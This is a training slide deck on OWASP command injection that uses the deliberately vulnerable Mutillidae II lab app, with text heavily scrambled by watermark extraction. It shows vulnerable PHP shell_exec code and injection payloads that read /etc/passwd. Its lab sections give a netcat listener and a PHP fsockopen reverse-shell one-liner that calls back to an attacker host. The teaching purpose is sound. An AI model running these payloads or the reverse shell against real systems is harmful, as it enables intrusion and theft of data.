Web Application Security


Web Application. Security. OWASP A1 ... Web Application Security. OWASP A1-‐Injection ...... [10] Mu:llidae: Using Command Injec:on to Gain Remote Desktop.

Web  Application   Security   ll A -

R

ts h g i

OWASP  A1  -­‐  Command   oIrnjection   f d D T SC

re P -

re a p

Jeremy  Druin   LC L IS Cer,fied  Lead  Informa,on  dSE ecurity   Analyst   n aWAPT-­‐GOLD,   GXPN,  GPEN,  GWAPT,   G GMOB,  GSEC,  Sec+   n ui r D y   m e r Je   t gh i r   opy C ) c (   ©  Copyright  Jeremy  Druin  -­‐  All  Rights  Reserved    

R

ed v r e es

C

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

INTRODUCTION  TO  INJECTION  

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

2  

Injec&on   • 

•       

ll A -

R

ts h g i

R

ed v r e es

D T Injec,on  may  be  possible  when  input  (data)  is  incorporated   SC with  code/ r fo script  fragments  passed  to  an  interpreter   d re a p •  Any  dynamically  generated  code/script  passed  tPo  reinterpreters   at  run,me  may  be   vulnerable   LC L ISXpath,  NoSQL   •  SQL,  CGI,  XML,  JavaScript,  SMTP,  LDAP,   E nd a in u r An  interpreter  cannot  dis,nguish   the  code  from  the  data  incorporated  at   D y m e run,me   r Je t gh i r py o C ) c (

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1-­‐Injection  

3  

Injec&on  

ll A -

R

ts h g i

R

D T C •  While  the  developer  intends  input  to  be  treated  as  data,  Sinterpreters   use   r fo context  to  decide  what  to  execute   d re a p e r •  Example   P LC   L IS E  Code:      ping     nd a in u r  Input  Data:    www.google.com   D y em www.google.com    Developer  sees:  Jepring   t h g  Interpreter   yrsi ees:  ping  www.google.com   p o C   (c)    

•  Developer  "knows"  code  is  blue  /  data  is  red    

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1-­‐Injection  

4  

Injec&on   •  •   

ll A -

R

ts h g i

R

D T C While  the  developer  intends  input  to  be  treated  as  data,  Sinterpreters   use   r fo context  to  decide  what  to  execute   d re a p e r Example   P LC L IS E  Code:      ping     nd a in u r  Input  Data  :    www.google.com;   cat  /etc/passwd   D y em www.google.com;  cat  /etc/passwd    Developer  sees:  Jepring   t h g  Interpreter   yrsi ees:  ping  www.google.com;  cat  /etc/passwd   p o C (c)

  •  Interpreter  "knows"  ping  and  cat  are  commands    

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1-­‐Injection  

5  

ts h g i

R

ed v r e es

Injec&on   ll R A D   CT S r assumes  this  will   ond   f •  The  develop  intends  for  data  to  enter  the  applica,on   a d e r always  be  the  case   pa e r P •  An  interpreter  cannot  dis,nguish  the  code   i ntended   by  the  developer  from   C L L the  data  incorporated  at  run,me   EIS nd a •  Both  code  and  data  are  ASCII  text   uin r y Dcontext  to  decide  and  “first  match  wins”   •  Interpreters  a`empt  to  umse   re e •  From  the  interpreters   t J point  of  view  the  developers  inten,ons  are  ambiguous   h rig y   op C c) (  

 

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1-­‐Injection  

6  

C

R

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

INTRODUCTION  TO  COMMAND  INJECTION  

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

7  

Command  Injec&on   ll A -

R

ts h g i

R

ed v r e es

  D T SC that  passes   •  Injec,ng  snippets  of  shell  script/CGI  script  into  an  applica,on   r fo d the  opera,ng  system  commands  to  the  host   re a p e r P supplied  input  into  the   •  May  occur  when  applica,on  incorporates  user   C LL host   opera,ng  system  command  passed  to  Sthe   EI d •  A`ack  takes  advantage  of  the  trust   nthe  host  (opera,ng  system)  has  in  the   a applica,on   uin r D y •  The  trust  boundary  violated   m is  between  the  web  applica,on  and  the  opera,ng   e r Je system   t gh i r •  The  a`ack  eoxecutes   on  the  host  opera,ng  system  under  the  applica&ons   py C ) account   c (

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

8  

C

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

COMMAND  INJECTION  BY  EXAMPLE  

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

9  

Command  Injec&on   ll R A   D CT •  The  DNS  Lookup  page  in  Mu,llidae  II  passes  the  IP  address/host   name   S r submi`ed  by  the  user  to  the  nslookup  command   red fo

ts h g i

a

p e r -P

h>p://mu&llidae/index.php?page=dns-­‐lookup.php   LC  

nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L S I E

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

10  

Command   Injec&on     •  Note:  Mu,llidae   contains  tutorials   that  may  be   helpful  

nd a n

  op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

11  

Command  Injec&on       Vulnerable  server-­‐ side    source  code  

Field  target_host  

nd a n

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

ui r D $lTargetHost = $_REQUEST["target_host"]; y m e r echo '
' Je t gh .shell_exec("nslookup " . $lTargetHost) i r y op .'
'; C (c)

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

12  

Command  Injec&on     •  When  user  submits  a  value,  the  server   incorporates  the  value  into  an  opera,ng   system  command   re $lTargetHost = P $_REQUEST["target_host"]; C L echo '
' d n .shell_exec("nslookup " in .a $lTargetHost) ru D y .'
'; em r

e tJ

gh i
   r py o  nslookup   C www.google.com   ) c 
  (

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

13  

Command  Injec&on     •  The  O/S  will  execute  the  ini,al   command  then  injected   commands
  

nd a  nslookup  www.google.com;   uinls   r D y
  m e r Je t gh i r py o C ) c (

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

14  

Command  Injec&on     •  Commands  can  be  chained
    nslookup  www.google.com;   LC L IS cd  /;  ls   E nd a 
  uin r D y m e r Je t gh i r py o C ) c (

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

15  

Command  Injec&on     •  Commands  can  be  run  to  explore  system,   escalate  privilege  and  open  resources   re P -

$lTargetHost = $_REQUEST["target_host"]; LC L echo '
' nd E a .shell_exec("nslookup u"in . r D $lTargetHost) y m e .'
'; er

t h g yri

J

   op C ) ww.google.com  &&  cat  /etc/passwd   nslookup   (cw 
 

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

16  

Command  Injec&on  

re Command   a p Injec,on   Pre nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L S I E

C L

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

17  

C

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

LOCATING  COMMAND  INJECTION  

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

18  

Loca&ng  Command  Injec&on   •  Look  for  pages  that  appear   to  execute  system   commands   •  ping,  nslookup,  traceroute,   nd etc.   a uin r D y •  CGI  scripts   m e r Je t gh i r py o C ) c (

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

19  

Loca&ng  Command  Injec&on   •  A>empt  to  iden&fy  the  opera&ng  system   •  HTTP  Response  vanity  headers   C •  x-­‐powered-­‐by,  Server,  x-­‐aspnet-­‐version,  etc.   LL

IS E •  May  be  able  to  infer  opera&ng  system   nd a from  clues   uin r D y m exclusively   e •  ASP.NET  runs  on  Windows   r Je t h •  IIS  version  is  yr,ig ed  directly  to  opera,ng   op system  C version   (c)

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

20  

Loca&ng  Command  Injec&on   •  A>empt  to  iden&fy  the  opera&ng  system  

re a p •  May  be  able  to  infer  opera&ng  system  from  clues   e r P •  ASP.NET  runs  on  Windows  exclusively   LLC IS E •  IIS  version  is  ,ed  directly  to  opera,ng   nd system  version   a in u r •  A>empt  to  cause  any  error   Don  any  page   y m e r •  Error  message  may   Jereveal  opera,ng  system   t gh i r py o C ) c (

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

File  paths  imply  Linux   opera&ng  system  

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

21  

Loca&ng  Command  Injec&on   •  A>empt  to  fuzz  input  fields  to  cause  error  message   for d e r a

D T SC

ll A -

R

ts h g i

•  Characters  reserved  in  opera,ng  system  shell   rep P •  /bin/bash:  !  #  $  %  &  '  (  )  *  +  ,  -­‐  .  /  :  ;L    |  '  `  ,  ;n  =d  (  )  !  ”  [  ]  .  *  ?     a n i u •  Non-­‐alphanumeric  ASCII  cyharacters   Dr m e r •  Command  injec,on   Jvealues  from  Fuzz  DB   t gh i r py •  Note  shell  func,ons   may  not  display  standard  error   o C (c) •  When  assessing  “blind”  pages  errors  may  be  inferred  by  missing  output  

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

22  

Loca&ng  Command  Injec&on   •  Blind  Command  Injec&on  

D T SC

ll A -

R

ts h g i

R

ed v r e es

or f d e r •  Some  vulnerable  pages  may  not  produce  explicit  output   pa e r P •  Two  methods  may  help  detect  command  injec,on   vulnerabili,es  in  these  cases   C L L S I E •  Missing  output   d an n •  Time-­‐delay  inference   ui r D y m e r Je t gh i r py o C ) c (

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

23  

Web  Application  Security   OWASP  A1:  Command  Injection   Loca&ng  Command  Injec&on   D

ll A -

R

ts h g i

R

ed v r e es

or f dinjec,on  may  interupt   •  In  some  cases  an  error  caused  by  fuzzing  for  command   e r pa e the  normal  flow  of  execu,on   r P •  The  site  may  suppress  error  messages  resul,ng   LC in  neither  normal  output  nor  error   L IS output   E nd a •  The  site  may  only  display  informa,on   from  standard  output  (stdout)  but  not  from  the   uin r standard  error  file  handle   (D stderr)   y m e r e ay  halt  execu,on  of  the  shell  command  before  the  command   •  The  injected  value  Jm t h can  generate  ro gutput   i py o C •  Use  differen,al   analysys  to  detect  differences  between  a  baseline  response  and   ) c ( other  responses  

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

•  When  fuzzing  for  command  injec&on  note  when  pages  aSre   CTmissing  output  

24  

Loca&ng  Command  Injec&on   ll A -

R

ts h g i

D T •  By  causing  the  response  &me  of  the  increase  measurably   SCit  may  be   r fo d possible  to  detect  command  injec&on  without  visible   re output   a p e r P ,me  of  a  normal  response   •  Use  ,me-­‐delay  inference  comparing  the  average   C against  an  a`acker  chosen  ,me  delay   S LL EI d n •  If  the  site  is  delayed  as  expected   caommand   injec,on  has  likely  taken  place   n i ru D y •  Example   m e er J takes  two  second  to  load  and  an  a`acker  injec,ons  a   •  If  a  page  typically   t h g yrtiakes  15  seconds  to  execute,  a  response  ,me  of  17  seconds   p command  that   o C implies  (ac  )vulnerability  

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

25  

Loca&ng  Command  Injec&on   ll A -

R

ts h g i

R

D T •  Time-­‐delay  inference  should  be  a>empted  with  commands   SC most  users   r fo d are  allowed  to  execute  that  cause  a  predictable  delay   re a p e r P increments  and  being   •  ping  may  work  well  due  to  running  in  one  second   LaCgainst  the  loopback  interface   L executable  by  users  on  Windows  and  Linux   IS E •  Windows:  ping  -­‐n  15  127.0.0.1  n and ui r D •  Linux:  ping  -­‐i  15  -­‐c  2m  1y27.0.0.1   re e tJ •  Try  prefixing  and  gshuffixing   the  injec,on  with  chaining  characters  discussed  in   i r upcoming  slides   py o C ) c •  ||,  |(,  &&,  &,  `,  ,    

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

26  

C

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

TESTING  COMMAND  INJECTION  

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

27  

Web  Application  Security   OWASP  A1:  Command  Injection   Tes&ng  Command  Injec&on   D T SC

ll A -

R

ts h g i

R

ed v r e es

d e r •  The  source  code  prior  to  the  injec,on  point  cannot   pbae  controlled   e r P C •  The  injec,on  must  work  with  the  exis,ng  LcLommand   Injec&on  occurs   S I E requires  chaining   here  so  a>acker   •  Successful  command  injec,on  typically   d n a influence  begins  at   n i u r   this  point   D y m e $lTargetHost = $_REQUEST["target_host"]; r Je t echo '
' gh i r py o .shell_exec("nslookup " . $lTargetHost) C ) (c .'
';

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

•  Once  vulnerability  located  (or  at  least  suspected)  test  focrommands  

28  

Tes&ng  Command  Injec&on   ll A -

R

ts h g i

R

ed v r e es

D T •  Command  chaining  allows  one  command  to  be  executed   once  the  previous   SC r o f d completes   e ar p re P   C L L IS Windows   E nd a   uin r D y command1command2 m  Runs  the  first  command  then  the  second  command   e r Je t command1  &  command2  Runs  the  first  command  then  the  second  command   gh i r y pommand2 o command1  &&   c  Run  second  command  only  if  first  command  successful   C ) (c

command1  ||  command2

 Run  second  command  only  if  first  command  fails  

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

29  

Tes&ng  Command  Injec&on  

ts h g i

R

ed v r e es

ll R A D T previous  completes   •  Command  chaining  allows  one  command  to  be  executed  once   tChe   S or f d e   r pa e r P Linux   LC L   IS E ntdhe  first  command  then  the  second  command   command1command2  Runs   a uin r command1;  command2   D  Runs  the  first  command  then  the  second  command   y m command1  &  command2  Jere  Runs  the  first  command  then  the  second  command   t gh i r command1  &&  command2  Run  second  command  only  if  first  command  successful   y p o C command1  |(c|  )command2  Run  second  command  only  if  first  command  fails  

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

30  

Tes&ng  Command  Injec&on   ll A -

R

ts h g i

D T •  Start  by  injec&ng  basic  commands  that  are  most  likely  rto   SCwork  at  any   fo d privilege  level   re a p e r P •  Linux   LC L •  ls  list  directory  contents   IS E nd a •  pwd  print  current  directory   path   uin r D y •  Windows   m e r Je t •  dir  list  driirectory   contents   gh py o •  cd ) C  print  current  directory  path   (c

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

31  

Tes&ng  Command  Injec&on     •  Start  by  injec&ng  basic   commands  that  are  most  likely   to  work  at  any  privilege  level   •  Directory  lis,ng  usually  possible   LC L IS E •  Prin,ng  the  current  directory;   nd a PWD  (Linux),  CD  (Windows)  also   uin r D generally  ubiquitous   y m e r Je t gh i r py o C ) c (

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

32  

Tes&ng  Command  Injec&on   D T •  A>empt  to  chain  commands  based  on  opera&ng  system   SC r fo d re a p e r P LC L IS E nd a uin r D y m e r Je t gh i r py o C ) c (

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

33  

C

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

USING  COMMAND  INJECTION  

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

34  

Command  Injec&on   ll A -

R

ts h g i

D T •  Once  command  injec&on  established  work  towards  control   SC of  system   r fo d re •  Determine  account  and  privilege  level  of  current  user   a p e r P •  Determine  current  loca,on  within  file  system   LC L EIS •  Catalog,  locate  and  pilfer  available  fidles   an n uiand  try  to  establish  shell   r •  Test  for  outbound  connec,vity   D y m e r •  A`empt  to  persist  aJccess   e t gh i r •  Pivot  into  internal   py network   o C ) c (

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

35  

Command  Injec&on  Example     •  Determine  account  and  privilege  level  of  current   or f d e user   r pa e r   -P www.google.com;whoami;pwd;ls   nd a n

  whoami

(c)

L L EIS

ui r D account    print  current  uyser   m e r Je t gh i r py o C

C

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

36  

Command  Injec&on  Example     •  Determine  current  loca&on  within  file  system   or f d e r   a rep www.google.com;whoami;pwd;ls  

  pwd   ls  

L L EIS

P C

nd a  print  current  directory   uin r  list  contents  m of  ycDurrent  directory   re e tJ h rig y op C (c)

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

37  

Command  Injec&on  Example     •  Catalog,  locate  and  pilfer  available  files     www.google.com;  cat  /etc/passwd  

 

nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

38  

C

ui r D

yecurity   Web  Applica,on   S m e er J t h OWASP  A1-­‐Injec,on   g yri op C (c)

COMMAND  INJECTION  DEFENSE  

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

39  

Command  Injec&on  Defense     •  Default  Deny   •  Least  Privilege   •  Data  Execu&on  Preven&on   nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

40  

Command  Injec&on  Defense    

D T SC

•  Default  Deny  

ll A -

R

ts h g i

R

ed v r e es

or f Someone   please  explain  why  this   d e •  By  default  the  web  applica,on  account  must  not   ar apache  server  account  is  allowed   p e r be  allowed  to  run  any  shell  commands   to  ping.  Do  web  servers  need  to   P check  to  see  if  their  cousin  IIS  is   LC L online?   EIS nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

41  

Command  Injec&on  Defense     •  Default  Deny    

re a p

or f d

D T SC

ll A -

R

ts h g i

re P •  If  opera,ng  system  func,onality  is  necessary   a-`empt  to  call  a  standard   C L L framework  func,on  that  will  supply  the   ISsame  result   E nd to  resolve  a  hostname  use  standard   •  For  example  if  a  PHP  applica,on   n eeds   a in u r func,on  gethostbyaddr()  rather   D than  execu,ng  nslookup  via  shell_exec()   y m e r Je t gh i r py o C ) c (

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

42  

Command  Injec&on  Defense     •  Least  Privilege  

D T SC

ll A -

R

ts h g i

or f d execute  specific,   e •  The  least-­‐privilege  principle  states  applica,ons  must   o nly   r pa e r preapproved  commands   P LC execu,ng  under  the  web   •  Default  deny  will  prevent  any  commands  Lfrom   IS E applica,on  account   nd a •  Least-­‐privilege  effec,vely  is  arn   uienxcep,on  to  default  deny  for  the  necessary   commands  (executable)  my D re e tJ h rig y op C (c)

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

43  

Command  Injec&on  Defense     •  Data  Execu&on  Preven&on  

D T SC

ll A -

R

ts h g i

R

ed v r e es

or f •  All  non-­‐alpha-­‐numeric  parameter  values  passed  to  tahe   redshell  script  must  be   p e r escaped   P LC of  "nn",  where  "nn"  is  a  string  of   •  Bash:  \0xx  translates  to  the  octal  ASCII  equivalent   L IS digit   E nd a   uin r D y •  Input  could  be  shell-­‐script   o r  data,  but  the  interpreter  (i.e.  Bash)  "knows"   m e r data     ere   escaped  characters   a J t h g ri when  the  input  forms  syntac,cally  correct  shell-­‐script   •  This  is  true  peyven   o C (c)

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Web  Application  Security   OWASP  A1:  Command  Injection  

44  

ru Web  Applica,on  Security   D y m e OWASP  A1-­‐Injec,on   r Je

C

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

i

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

t

gh Command  Injec,on   i r py o C ) c (

LAB  

45  

Command  Injec&on     •  Extract  /etc/password  

nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

46  

ts Command  Injec&on  to  extract  / h g i R l etc/password   Al D T   SC r fo •  The  DNS  lookup  page  in   d re a p e Mu&llidae  II  contains  a   r P command  injec&on  vulnerability   LC L IS E •  Ubuntu   nd a •  h`p://localhost/mu,llidae/ ruin D y index.php?page=dns-­‐lookup.php   m e r Je •  Samurai  WTF   t gh i r py •  h`p://mu,llidae/index.php? o C ) c page=dns-­‐lookup.php   (

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

47  

ts Command  Injec&on  to  extract  /etc/ h g i R l password   Al D T   SC r fo •  Locate  the  command  injec,on   d re a p e vulnerability  using  command  separators   r P and  universal  binaries   LC

•  •  •  • 

&  ls   |  ls   ;  ls   Others   op C (c)

nd a n

t h g yri

J

m e r e

y

ui r D

L S I E

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

48  

Command  Injec&on  to  extract  /etc/ password     •  Determine  the  current  directory   •  &  pwd   nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

re P -

re a p

or f d

D T SC

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

49  

ts Command  Injec&on  to  extract  /etc/ h g i R l password   Al D T   SC r fo •  Use  directory  traversal  to  move  out  of   d re a p e the  web  root  directory  and  access  / r P C etc/passwd   LL

•  &  cat  /etc/passwd    

op C (c)

t h g yri

J

m e r e

y

uin r D

IS E d an

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

50  

ru Web  Applica,on  Security   D y m e OWASP  A1-­‐Injec,on   r Je

C

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

i

nd a n

L L EIS

re P -

re a p

or f d

D T SC

ll A -

ts h g i

ed v r e es

t

gh Command  Injec,on   i r py o C ) c (

LAB  

51  

Command  Injec&on     •  Reverse  bash  shell  

D T SC

or f d •  Reference:  demo-­‐command-­‐injec,on-­‐reverse-­‐shell-­‐via-­‐php.txt   e r pa e r P LC L IS E nd a uin r D y m e r Je t gh i r py o C ) c (

ll A -

R

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

52  

ts Command  injec&on  to  gain   h g i R l reverse  bash  shell   Al D T   SC r fo •  The  DNS  lookup  page  in   d re a p e Mu&llidae  II  contains  a   r P command  injec&on  vulnerability   LC L IS E •  Ubuntu   nd a •  h`p://localhost/mu,llidae/ ruin D y index.php?page=dns-­‐lookup.php   m e r Je •  Samurai  WTF   t gh i r py •  h`p://mu,llidae/index.php? o C ) c page=dns-­‐lookup.php   (

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

53  

ts Command  injec&on  to  gain  reverse  bash   h g i R l shell   Al D T   SC r fo •  Locate  the  command  injec&on   d re a p e vulnerability  using  command   r P C separators  and  universal  binaries   LL

•  •  •  • 

&  ls   |  ls   ;  ls   Others  

op C (c)

t h g yri

J

m e r e

y

uin r D

IS E d an

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

54  

Command  injec&on  to  gain  reverse  bash  shell    

ll A -

R

ts h g i

R

ed v r e es

D T SC •  Send  commands  tes&ng  outbound  connec&vity  from  voulnerable   server   r f d e back  to  a>acker  controlled  host   r pa e r •  Set  up  listener  on  a`acker  controlled  host   - P C L L •  A`empt  to  have  web  applica,on  server   ISreach  out  to  a`acker  host  over  various   E protocols  and  ports   nd a n •  ICMP  à  ping  -­‐c  1  10.0.0.164  rui D y •  UDP  à    tracepath  -­‐c  re 1  m 10.0.0.164   e tJ •  TCP  à    telnet   1 0.0.0.164   1234   h g i r ppyrotocols  likely  to  be  allowed   o •  Test  ports  a) nd   C c ( •  DNS,  web,  proxy,  etc.  

 

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

55  

R

ts Command  injec&on  to  gain  reverse  bash  shell   h g i R l Al   D T •  Set  up  tcpdump  on  local  host  filtering  for  incoming  packets   SC des&ned  for   r fo d a>acker  IP   re a

•  tcpdump  -­‐i  eth0  -­‐vv  -­‐X  dst    

 

nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

L L EIS

C

p e r -P

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

56  

Command  injec&on  to  gain  reverse  bash  shell     •  A`empt  to  have  web  applica,on  send  packet  

D T SC

ll A -

R

ts h g i

R

ed v r e es

or f d •  www.google.com;  tracepath  -­‐c  1  10.224.35.168  (UDP)   e r pa e r •  www.google.com  &  telnet  10.224.35.168  1234   P(TCP)   LC L IS E nd   a A>acking  host  receives  packet   uin r D confirming  connec&vity   y m re e tJ h rig y op C (c)

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

57  

R

ed v r e es

ts Command  injec&on  to  gain  reverse  bash  shell   h g i R l Al   D T C server  connect   •  If  outbound  connec&vity  established  a>empt  to  have  w eb   S r fo d back  to  a>acker  host   re

•  Set  up  listener  on  a`acker  host   nc  -­‐l  -­‐p  1234  

nd a n

op C (c)

t h g yri

J

m e r e

y

ui r D

a

L L EIS

C

p e r -P

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

58  

R

ed v r e es

ts Command  injec&on  to  gain  reverse  bash  shell   h g i R l Al   D T C server  connect  back  to   •  If  outbound  connec&vity  established  a>empt  to  have  w eb   S r fo d a>acker  host   re

pa e r •  Once  listener  set-­‐up,  ask  web  applica,on  server   Pto  connect  back  to  a`acker  host   LC •  Set  IP  address  appropriately   L IS E nd www.google.com;php  -­‐r  '$sock=fsockopen(”",);exec("/bin/sh   -­‐i  &3  2>&3");'   a n i ru D   y m e er J t h g yri p o C (c)

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

59  

Command  injec&on  to  gain   reverse  bash  shell     •  Once  web  applica&on   server  establishes   connec&on,  a  shell  should   be  opened  

nd a •  Note  a  shell  is  not  a  terminal   uin r D •  The  shell  runs  with  the  emy er J privileges  of  the  web   t h g applica,on  account   yri p o C (c)

D T SC

ll A -

R

Type   or commands   f d into  shell   e r a

L L EIS

C

p e r -P

ts h g i

R

ed v r e es

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

Lab  

60  

ru Web  Applica,on  Security   D y m e OWASP  A1-­‐Injec,on   r Je

C

R

R

©  Copyright  Jeremy  Druin  -­‐  All   Rights  Reserved  

i

nd a n

L L EIS

re P -

re a p
